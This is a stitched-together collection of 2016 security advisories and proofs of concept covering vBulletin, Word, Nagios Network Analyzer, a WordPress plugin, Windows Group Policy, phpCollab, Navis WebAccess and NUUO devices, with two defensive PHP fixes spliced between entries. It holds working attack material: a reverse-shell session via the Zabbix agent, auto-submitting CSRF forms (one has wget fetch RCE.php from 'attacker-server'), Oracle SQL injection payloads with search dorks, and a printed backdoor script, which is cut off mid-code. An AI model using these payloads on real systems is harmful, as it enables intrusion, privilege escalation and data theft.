192.168.57.10:58683 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /22" - 301
Conection opened for 2 seconds. Port 22 is opened!
192.168.57.10:58686 - - [30/Jul/2016 03:00:27] "HTTP/1.1 GET /23" - 301
192.168.57.10:58690 - - [30/Jul/2016 03:00:27] "HTTP/1.1 GET /24" - 301
192.168.57.10:58694 - - [30/Jul/2016 03:00:28] "HTTP/1.1 GET /25" - 301
Conection opened for 2 seconds. Port 25 is opened!
192.168.57.10:58697 - - [30/Jul/2016 03:00:30] "HTTP/1.1 GET /26" - 301
[...]
192.168.57.10:58909 - - [30/Jul/2016 03:00:36] "HTTP/1.1 GET /79" - 301
192.168.57.10:58913 - - [30/Jul/2016 03:00:36] "HTTP/1.1 GET /80" - 301
Conection opened for 2 seconds. Port 80 is opened!
192.168.57.10:58917 - - [30/Jul/2016 03:00:38] "HTTP/1.1 GET /81" - 301
192.168.57.10:58921 - - [30/Jul/2016 03:00:38] "HTTP/1.1 GET /82" - 301
192.168.57.10:58925 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /83" - 301
192.168.57.10:58929 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /84" - 301
192.168.57.10:58933 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /85" - 301
Scanning done in 14 seconds.
* Opened ports on the target [http://192.168.57.10/vBulletin522new/]:
Port 22 : Opened
Port 25 : Opened
Port 80 : Opened
Anything juicy? :)
Want to execute a reverse shell via the Zabbix Agent? (start netcat before you continue) [y/n] y
* Executing reverse shell via Zabbix Agent (10050).
192.168.57.10:58940 - - [30/Jul/2016 03:00:45] "HTTP/1.1 GET /zabbixcmd_redir" - 301
Looks like Zabbix Agent executed our bash payload! Check your netcat listening on port 8080 for shell! :)
Job done. Exiting
Here is what the netcat session looks like after successful exploitation:
$ nc -vvv -l -p 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [192.168.57.10] port 8080 [tcp/*] accepted (family 2, sport 54259)
zabbix@trusty:/$ id
id
uid=122(zabbix) gid=129(zabbix) groups=129(zabbix)
zabbix@trusty:/$
As we can see, the reverse shell was executed on the target and successfully
connected back to the attacker's netcat listener.
VI. BUSINESS IMPACT
-------------------------
The vulnerability can expose internal services running on the server/within
the local network.
If not patched, unauthenticated attackers or automated scanners searching for
vulnerable servers could send malicious data to internal services.
Depending on services in use, the impact could range from sensitive information
disclosure, sending spam, DoS/data loss to code execution as demonstrated by
the PoC exploit in this advisory.
VII. SYSTEMS AFFECTED
-------------------------
All vBulletin forums in all branches (5.x, 4.x , 3.x) without the latest patches
named in the next section are affected by this vulnerability.
VIII. SOLUTION
-------------------------
In response to this advisory, the vendor has published the following security releases of
vBulletin for each of the affected branches:
vBulletin 5.2.3
vBulletin 4.2.4 Beta
vBulletin 3.8.10 Beta
Separate patches have also been released (see references below).
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6483
vBulletin patches:
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349551-security-patch-vbulletin-5-2-0-5-2-1-5-2-2
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349549-security-patch-vbulletin-4-2-2-4-2-3-4-2-4-beta
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349548-security-patch-vbulletin-3-8-7-3-8-8-3-8-9-3-8-10-beta
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
05.08.2016 - final advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''
#####################################################################################
# Application: Microsoft Office Word
# Platforms: Windows, OSX
# Versions: Microsoft Office Word 2007,2010,2013,2016
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @SebMorin1, @COSIG_
# Date: August 09, 2016
# CVE: CVE-2016-3313
# COSIG-2016-31
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#######################################################################################
===================
1) Introduction
===================
Microsoft Word is a word processor developed by Microsoft. It was first released on October 25, 1983 under the name Multi-Tool Word for Xenix systems. Subsequent versions were later written for several other platforms including IBM PCs running DOS (1983), Apple Macintosh running Mac OS (1985), AT&T Unix PC (1985), Atari ST (1988), OS/2 (1989), Microsoft Windows (1989) and SCO Unix (1994). Commercial versions of Word are licensed as a standalone product or as a component of Microsoft Office, Windows RT or the discontinued Microsoft Works suite. Microsoft Word Viewer and Office Online are Freeware editions of Word with limited features.
(https://en.wikipedia.org/wiki/Microsoft_Word)
#######################################################################################
===================
2) Report Timeline
===================
2016-05-15: Sébastien Morin of COSIG reported the vulnerability to MSRC.
2016-06-07: MSRC confirmed the vulnerability.
2016-08-09: Microsoft fixed the issue (MS16-099).
2016-08-09: Advisory released.
#######################################################################################
===================
3) Technical details
===================
This vulnerability allows remote code execution if a user opens a specially crafted Microsoft Office Word document (.doc) containing an invalid WordDocumentStream.
An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user.
#######################################################################################
==========
4) POC
==========
https://smsecurity.net/wp-content/uploads/2016/08/COSIG-2016-31.doc
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40224.zip
#######################################################################################
[+] Credits: John Page ( hyp3rlinx )
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NAGIOS-NA-v2.2.1-MULTIPLE-CSRF.txt
[+] ISR: ApparitionSec
Vendor:
===============
www.nagios.com
Product:
==============================
Nagios Network Analyzer v2.2.1
Netflow Analysis, Monitoring, and Bandwidth Utilization Software
Network Analyzer provides an in-depth look at all network traffic sources and potential
security threats, allowing system admins to quickly gather high-level information regarding
the health of the network as well as highly granular data for complete and thorough network
analysis.
Vulnerability Type:
=================================
Cross Site Request Forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Nagios NA has multiple CSRF vectors, allowing unauthorized commands to be
transmitted on behalf of a user that the website trusts if that user is
authenticated and visits a malicious webpage or clicks an attacker-supplied
link. The Nagios system can be compromised as remote attackers
can create arbitrary commands, e.g. using "wget" to download RCE files onto
the system, create arbitrary admins, delete users, and conduct
DoS attacks.
Exploit code(s):
================
1) Create arbitrary commands
<form action="
http://victim-server/nagiosna/index.php/api/system/create_command"
method="post">
<input type="hidden" name="name" value="pwn">
<input type="hidden" name="location" value="%2Fusr%2Fbin%2Fwget">
<input type="hidden" name="script" value="wget">
<input type="hidden" name="args"
value="http%3A%2F%2Fattacker-server%2FRCE.php">
<script>document.forms[0].submit()</script>
</form>
2) Add Admin
<form action="http://victim-server/nagiosna/index.php/admin/users/create"
method="post" accept-charset="utf-8">
<input type="text" name="first_name" value="CSRF">
<input type="text" name="last_name" value="ME">
<input type="text" name="company" value="PWN">
<input type="text" name="email" value="evil@abyss.com">
<input type="text" name="phone" value="">
<input type="text" name="username" value="HYP3RLINX">
<input type="password" name="password" value="abc123">
<input type="password" name="password2" value="abc123">
<input type="hidden" name="language" value="default" >
<input type="hidden" name="account_type" id="account_type" value="local">
<input type="hidden" name="ldap_server" id="ldap_server">
<input type="hidden" name="ad_server" id="ad_server" value="1">
<input type="text" name="ad_username" id="ad_username">
<input type="text" name="dn" placeholder="cn=John Smith,dn=nagios,dc=com">
<input type="radio" name="group" value="1" checked="true" >
<input type="radio" name="apiaccess" value="1" >
<input type="radio" name="apiaccess" value="0" checked>
<script>document.forms[0].submit()</script>
</form>
3) Delete reports (report ID must be known or guessed)
<form action="http://victim-server/nagiosna/index.php/api/reports/delete"
method="post">
<input type="hidden" name="q[rid]" value="9">
<script>document.forms[0].submit()</script>
</form>
4) DOS
<form action="http://victim-server/nagiosna/index.php/api/system/stop"
method="post">
<input type="hidden" name="sid" value="1">
<script>//document.forms[0].submit()</script>
</form>
5) Delete users (user ID must be known or guessed)
<form action="http://victim-server/nagiosna/index.php/admin/users/delete"
method="post">
<input type="hidden" name="id" value="10">
<script>document.forms[0].submit()</script>
</form>
Disclosure Timeline:
======================================
Vendor Notification: July 20, 2016
Vendor Acknowledgement: July 21, 2016
Vendor Fix / Release: August 1, 2016
August 8, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
Cross-Site Request Forgery vulnerability in Add From Server WordPress Plugin
Abstract
It was discovered that Add From Server is vulnerable to Cross-Site Request Forgery. It can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement). An attacker can use this issue to add illegal content to the victim's server, or to add very large files to the victim's server to exhaust the available disk space.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160718-0004
Tested versions
These issues were successfully tested on Add From Server WordPress Plugin version 6.2.
Fix
This issue is resolved in Add From Server version 3.3.2.
Introduction
The Add From Server WordPress Plugin is a quick plugin which allows you to import media & files into the WordPress uploads manager from (remote) webservers. It was discovered that Add From Server is vulnerable to Cross-Site Request Forgery. It can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement). Because of this, the following attack scenarios could be possible:
- Adding illegal content to the victim's server.
- Adding very large files to the victim's server to exhaust the available disk space.
Details
When a (media) file is added from the server, the source is not validated. This means that not only files from the localhost can be added, but also from other sources. The affected code is not protected with an anti-Cross-Site Request Forgery token.
The function handle_imports() only removes slashes. The vulnerability exists in the file add-from-server/class.add-from-server.php (line 213). Because slashes are removed, the file that will be uploaded must exist in the server root. For example: www.example.com/largefile.txt
The host and filename will be set in a separate parameter, so no slashes are needed.
Proof of concept
POST /wp-admin/upload.php?page=add-from-server HTTP/1.1
Host: <target>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
files%5B%5D=largefile.txt&import-date=current&cwd=www.example.com&import=Import
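The Nagios NA forms above and the Add From Server import share a single root cause: a state-changing POST handler that trusts any request carrying the victim's session cookie. The following added example, not code from either project, shows the synchronizer-token fix in plain PHP for a hypothetical create_command handler (endpoint path from the advisory, everything else assumed); a WordPress plugin would use wp_nonce_field() and check_admin_referer() for the same purpose.

```php
<?php
// Added example: synchronizer-token CSRF protection for a hypothetical
// "create_command" handler modelled on the Nagios NA endpoint above.
// Not Nagios or Add From Server code; paths and field names are assumptions.
declare(strict_types=1);

// Defence in depth: a SameSite cookie stops the browser attaching the
// session cookie to cross-site POSTs at all (PHP >= 7.3).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// One random token per session, stored server-side and embedded in the form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; false for a missing, empty or wrong token.
function csrf_valid(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    if ($expected === '' || $submitted === null || $submitted === '') {
        return false;
    }
    return hash_equals($expected, $submitted);
}

// A cross-site page can make the browser send the victim's cookie, but it
// cannot read the token embedded in the legitimate form, so an attacker-
// supplied form like the PoC above fails this check.
function handle_create_command(array $post): array
{
    if (!csrf_valid($post['csrf_token'] ?? null)) {
        http_response_code(403);
        return ['ok' => false, 'error' => 'missing or invalid CSRF token'];
    }
    // Do not trust an arbitrary interpreter path such as /usr/bin/wget from
    // the request: only locations from an administrator-defined list pass.
    $allowedLocations = ['/usr/local/nagios/libexec']; // assumed
    $location = rtrim((string)($post['location'] ?? ''), '/');
    if (!in_array($location, $allowedLocations, true)) {
        return ['ok' => false, 'error' => 'location not permitted'];
    }
    $name = preg_replace('/[^A-Za-z0-9_-]/', '', (string)($post['name'] ?? ''));
    if ($name === '') {
        return ['ok' => false, 'error' => 'invalid command name'];
    }
    // The application would persist the validated command at this point.
    return ['ok' => true, 'name' => $name, 'location' => $location];
}

// The legitimate form carries the token as a hidden field.
function render_form(): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="/nagiosna/index.php/api/system/create_command">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input name="name"> <input name="location"> <input name="args">'
         . '<button>Create</button></form>';
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    header('Content-Type: application/json');
    echo json_encode(handle_create_command($_POST));
} else {
    echo render_form();
}
```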
# Exploit Title: Group Policy Elevation of Privilege Vulnerability
# Date: 08-08-2016
# Exploit Author: Nabeel Ahmed
# Tested on: Windows 7 Professional (x32/x64)
# CVE : CVE-2016-3223
# Category: Privilege Escalation
SPECIAL CONFIG: Standard Domain Member configuration with valid credentials. (Standard Domain User with valid credentials)
SUMMARY: This vulnerability allows an attacker to create/modify local Administrator account through a fake Domain Controller by creating User Configuration Group Policies.
1) Prerequisites:
- Standard Windows 7 Fully patched and member of an existing domain. (e.g. domain.local)
- Domain User Credentials are known with no Administrative rights.
- Computer has to be connected on a network.
- Fake Domain Controller
2) Reproduce:
STEP 1: Determine domain of the target computer (e.g. domain.local)
STEP 2: Boot the system and determine the FQDN of the device (e.g. CLIENT.domain.local); this can be obtained by monitoring the network broadcast communication which the system sends prior to logging in. The username can be extracted from the login screen (e.g. USER1).
STEP 3: Create Active Directory for the domain you obtained in STEP 2 (domain.local).
STEP 4: Create a user with the same name and password as on the target computer (e.g. domain\USER1:password123!).
STEP 5: Login on the target system with the known Username and Password without any network connection (using cached credentials).
STEP 6: Establish network connection between the target system and the newly created Domain Controller.
STEP 7: Create a Group Policy called "Create Local Admin"
STEP 8: Edit the "Create Local Admin" Group Policy to create in the User Configuration section a new user called "TestAdmin" and add him to the group "Administrators".
STEP 9: Open Command Prompt on the target system and execute the following command: "gpupdate /target:user /force"
STEP 10: User Policy update will complete successfully.
STEP 11: Confirm the newly created Administrator "TestAdmin" by executing the following command in Command Prompt: "net localgroup Administrators"
STEP 12: "TestAdmin" user will be member of the Administrators group.
3) Impact:
A regular Domain User can gain higher privileges on his system by creating a new administrator through Group Policies created on a fake Domain Controller
4) Solution:
Install the latest patches from 14-06-2016 using Windows Update.
5) References:
https://technet.microsoft.com/en-us/library/security/ms16-072.aspx
https://support.microsoft.com/en-us/kb/3163622
6) Credits:
Vulnerability discovered by Nabeel Ahmed (https://twitter.com/NabeelAhmedBE) and Tom Gilis (https://twitter.com/tgilis) of Dimension Data (https://www.dimensiondata.com)
Document Title:
===============
phpCollab v2.5 CMS - SQL Injection Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1898
Release Date:
=============
2016-08-08
Vulnerability Laboratory ID (VL-ID):
====================================
1898
Common Vulnerability Scoring System:
====================================
6.6
Product & Service Introduction:
===============================
phpCollab is an open source internet-enabled system for use in projects that require collaboration over the internet. Those organizations,
such as consulting firms, that rely on a division between firm-side and client-side information will benefit most from use of phpCollab.
Abstract Advisory Information:
==============================
The vulnerability laboratory research team discovered a remote sql-injection web vulnerability in the official phpCollab v2.5 content management system.
Vulnerability Disclosure Timeline:
==================================
2016-08-08: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
phpCollab Community
Product: phpCollab - Content Management System 2.5
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A remote sql-injection web vulnerability has been discovered in the official phpCollab v2.5 content management system.
The vulnerability allows remote attackers to execute their own malicious sql commands to compromise the application or dbms.
The sql-injection vulnerability is located in the `id` parameter of the `./phpcollab/users/` module GET method request.
Remote attackers are able to execute their own sql commands by usage of the insecure `emailusers.php` file GET method request.
The attack vector of the vulnerability is application-side and the request method to inject is GET. The vulnerability
is a classic select remote sql-injection.
The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6.
Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] ./phpcollab/users/
Vulnerable File(s):
[+] emailusers.php
Vulnerable Parameter(s):
[+] id
Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account and without user interaction.
For security demonstration or to reproduce the sql-injection web vulnerability follow the provided information and steps below to continue.
PoC: Exploitation
http://phpcollab.localhost:8080/phpcollab/users/emailusers.php?id=1'[SQL-INJECTION VULNERABILITY!]&&PHPSESSID=ghtu76jt276nji04lua07930t5
--- Error Exception Logs [SQL] ---
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 2
-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://phpcollab.localhost:8080/phpcollab/users/emailusers.php?id=1%27&&PHPSESSID=ghtu76jt276nji04lua07930t5
Mime Type[text/html]
Request Header:
Host[phpcollab.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Cookie[PHPSESSID=ghtu76jt276nji04lua07930t5; _pk_id.2.bb5e=7b20cb9175a196a9.1470585617.1.1470586689.1470585617.;
_pk_ref.2.bb5e=%5B%22%22%2C%22%22%2C1470585617%2C%22http%3A%2F%2Fphpcollab.localhost:8080%2Fdemo%2F1%2F394%2FStash%22%5D; _pk_ses.2.bb5e=*]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Server[nginx/1.2.1]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
X-Powered-By[PHP/5.5.27-1+deb.sury.org~precise+1]
Reference(s):
http://phpcollab.localhost:8080/
http://phpcollab.localhost:8080/phpcollab/
http://phpcollab.localhost:8080/phpcollab/users/
http://phpcollab.localhost:8080/phpcollab/users/emailusers.php
Solution - Fix & Patch:
=======================
The vulnerability can be patched by usage of a prepared statement in the emailusers.php file GET method request.
Disallow special chars and escape the input and output context entries to prevent further sql-injection attacks.
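emailusers.php itself is not reproduced on the page, so the query below is a hypothetical reconstruction of a lookup by the `id` GET parameter (table and column names assumed). This added example, not phpCollab code, places the concatenating query the advisory describes beside a validated, parameterised PDO version; it runs against an in-memory SQLite database, so it assumes the pdo_sqlite extension.

```php
<?php
// Added example, not phpCollab code. Assumption: emailusers.php looks a user
// up by the GET parameter `id`; the users table and its columns are invented.
declare(strict_types=1);

// Vulnerable pattern: the raw parameter is spliced into the SQL text, so
// id=1' unbalances the quotes and produces the MySQL syntax errors shown above.
function build_vulnerable_query(string $id): string
{
    return "SELECT id, name, email_work FROM users WHERE id = '" . $id . "'";
}

// Hardened pattern: validate the type first, then bind the value as a
// parameter so the database engine never parses it as SQL.
function fetch_user(PDO $db, $rawId): ?array
{
    // `id` must be a positive integer; anything else is rejected before any query runs.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, name, email_work FROM users WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Self-contained demonstration on SQLite (the product uses MySQL; this SQL is portable).
$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares, not client-side quoting
]);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email_work TEXT)');
$db->exec("INSERT INTO users VALUES (1, 'alice', 'alice@example.test')"); // constructed row

// The injection string from the PoC above, against both code paths.
$payload = "1'";
echo "Unsafe SQL text: ", build_vulnerable_query($payload), PHP_EOL;
echo "Hardened lookup with the payload: ";
var_dump(fetch_user($db, $payload));   // validation rejects it, no query is issued
echo "Hardened lookup with a legitimate id: ";
var_dump(fetch_user($db, '1'));        // the bound query returns the row
```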
Security Risk:
==============
The security risk of the remote sql-injection web vulnerability in the id parameter of the emailusers.php file is estimated as high. (CVSS 6.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to ask for permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Product -> Navis WebAccess - SQL Injection
Date -> 8/8/2016
Author -> bRpsd
Skype: vegnox
Vendor HomePage -> http://www.navis.com/
Product Download -> http://navis.com/pr_webaccess.jsp (currently under maintenance)
Product Version -> Express/All
DBMS -> Oracle
Tested on > Apache/2.0.54 (Win32)
{{ Dorks }}
"Copyright © 2016 Navis, A Zebra Technologies Company"
"Confidential Information of Navis, A Zebra Technologies Company"
inurl:GKEY= ext:do
inurl:/express/secure/Today.jsp
navis.com webaccess
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#############
|DESCRIPTION|
#############
"Navis WebAccess is a web-based application that provides all parties across the terminal with an easy-to-use web browser interface for accessing a wealth of transaction data that was previously inaccessible from outside the terminal. All terminal constituents, including shipping lines, trucking companies, port authorities, government agencies, agents, shippers, consignees, distribution centers and depots are better served with 24/7 access to real-time container, vessel and truck transaction information. Users can view load and discharge lists, reports, and EDO details as well as view and make appointments, set and release holds, download and upload EDI files and pay for demurrage."
Vulnerability: SQL Injection
File: /express/showNotice.do
Vul Parameter: GKEY
================================================================================================
Test #1
http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2'
Response Error:
ORA-00933: SQL command not properly ended
================================================================================================
Test #2 => Payload (Proof Of Concept)
http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2 AND 9753=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9753=9753) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
Response Error:
ORA-00600: internal error code, arguments: [733], [277608912], [pga heap], [], [], [], [], [], [], [], [], [] ORA-06512: at "SYS.XMLTYPE", line 310 ORA-06512: at line 1
======================================================================================================================================================================================
NUUO Backdoor (strong_user.php) Remote Shell Access
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo devices have a hidden PHP script
that, when called, creates a backdoor user with poweruser privileges that is able
to read and write files on the affected device. The backdoor user 'bbb', created
with the password '111111' by visiting the 'strong_user.php' script, is able to initiate a
secure shell session and further steal and/or destroy sensitive information.
==================================================================
/strong_user.php:
-------------------------------
<?php
class ReadPasswd{
    private $file;
    private $fileData;
    private $error;
    function __construct($file) {
        try{
            if (is_file($file))
            {
                $this->fileData = file($file);
                $this->file = $file;
            }
            else
            {
                throw new Exception("Couldn’t open file.");
            }
        } catch (Exception $e) {
            $this->error[] = $e->getMessage();
        }
    }
    public function getAllHTML(){
        $output = '';
        foreach ($this->fileData as $content)
        {
            $temp = explode(':', $content);
            $output .= "<b>Username: {$temp[0]} </b><br />";
            $output .= "Validation: {$temp[1]} <br />";
            $output .= "User Identifier: {$temp[2]} <br />";
            $output .= "Group Identifier: {$temp[3]} <br />";
            $output .= "Gecos Field: {$temp[4]} <br />";
            $output .= "Home Directory: {$temp[5]} <br />";
            $output .= "Shell: {$temp[6]} <br />";
            $output .= "<br />";
        }
        return $output;
    }
    public function getAllCLI() {
        $output = '';
        foreach ($this->fileData as $content)
        {
            $temp = explode(':', $content);
            $output .= "Username: {$temp[0]} \n";
            $output .= "Validation: {$temp[1]} \n";
            $output .= "User Identifier: {$temp[2]} \n";
            $output .= "Group Identifier: {$temp[3]} \n";
            $output .= "Gecos Field: {$temp[4]} \n";
            $output .= "Home Directory: {$temp[5]} \n";
            $output .= "Shell: {$temp[6]} \n";
            $output .= "\n";
        }
        return $output;
    }
    public function searchUser($user,$data=0) {
        try{
            $data = array();
            if (is_string($user))
            {
                foreach($this->fileData as $line)
                {
                    $temp = explode(':', $line);
                    if (in_array($user,$temp))
                    {
                        if ($data) return 1;
                        $data['username'] = $temp[0];
                        $data['validation'] = $temp[1];
                        $data['user_identifier'] = $temp[2];
                        $data['group_identifier'] = $temp[3];
                        $data['gecos'] = $temp[4];
                        $data['home_directory'] = $temp[5];
                        $data['shell'] = $temp[6];
                    }
                }
            }
            else
            {
                throw new Exception('A search error has occured.');
            }
        } catch (Exception $e) {
            $this->error[] = $e->getMessage();
        }
        return $data;
    }
    public function getError() {
        return $this->error;
    }
    public function deleteUser($user) {
        try{
            if ($this->searchUser($user,1))
            {
                $final = '';
                foreach ($this->fileData as $line)
                {
                    $lines = explode(":",$line);
                    if (!in_array($user,$lines))
                    {
                        $final .= $line;
                    }
                }
                if(!file_put_contents($this->file,$final))
                {
                    throw new Exception("Could not delete user.");
                }
            }
            else
            {
                throw new Exception("User doesn’t exist.");
            }
        } catch (Exception $e) {
            echo $this->error[] = $e->getMessage();
        }
    }
}
/*
echo "Strong test ";
ma_getuser();
ma_getgroup();
$result = array('users' => array(), 'groups' => array());
echo "<br>";
echo $maUser;
echo "<br>";
echo $maGroup;
echo "<br>";
foreach($maGroup as $key =>$value)
{
    $tmp = array();
    $tmp['groupname'] = $maGroup[$key]->strGroupname;
    $tmp['members'] = array();
    echo "Group (" . $key . ") === " . $maGroup[$key]->strGroupname;
    echo "<br><br>";
    ma_getgroupmember($maGroup[$key]->strGroupname);
    foreach ($maGroupmember as $mKey => $mValue)
    {
        echo " User ($mKey) ===> $mValue ";
        echo "<br>";
        array_push($tmp['members'], $maGroupmember[$mKey]->strUsername);
    }
    //foreach($value as $userkey => $uservalue)
    //{
    //    echo " User ($userkey) ===> $uservalue ";
    //    echo "<br>";
    //}
    echo "<br>";
    echo implode(",", $tmp['members']);
    echo "<br>";
    $tmp['membersStr'] = implode(",", $tmp['members']);
    array_push($result['groups'], $tmp);
}
echo "<h1> Other </h1>";
$tmp = array();
$tmp['groupname'] = 'admin';
ma_getgroupmember($tmp['groupname']);
//ma_getgroupmember('');
$tmp['members'] = array();
foreach ($maGroupmember as $mKey => $mValue)
{
    array_push($tmp['members'], $maGroupmember[$mKey]->strUsername);
    echo $maGroupmember[$mKey]->strUsername . "<br>";
}
$tmp['membersStr'] = implode(",", $tmp['members']);
array_push($result['groups'], $tmp);
echo "<h1> USER </h1>";
foreach ( $maUser as $key => $value)
{
    $tmp = array();
    $tmp['username'] = $maUser[$key]->strUsername;
    $tmp['groups'] = array();
    foreach ($result['groups'] as $gKey => $gValue)
    {
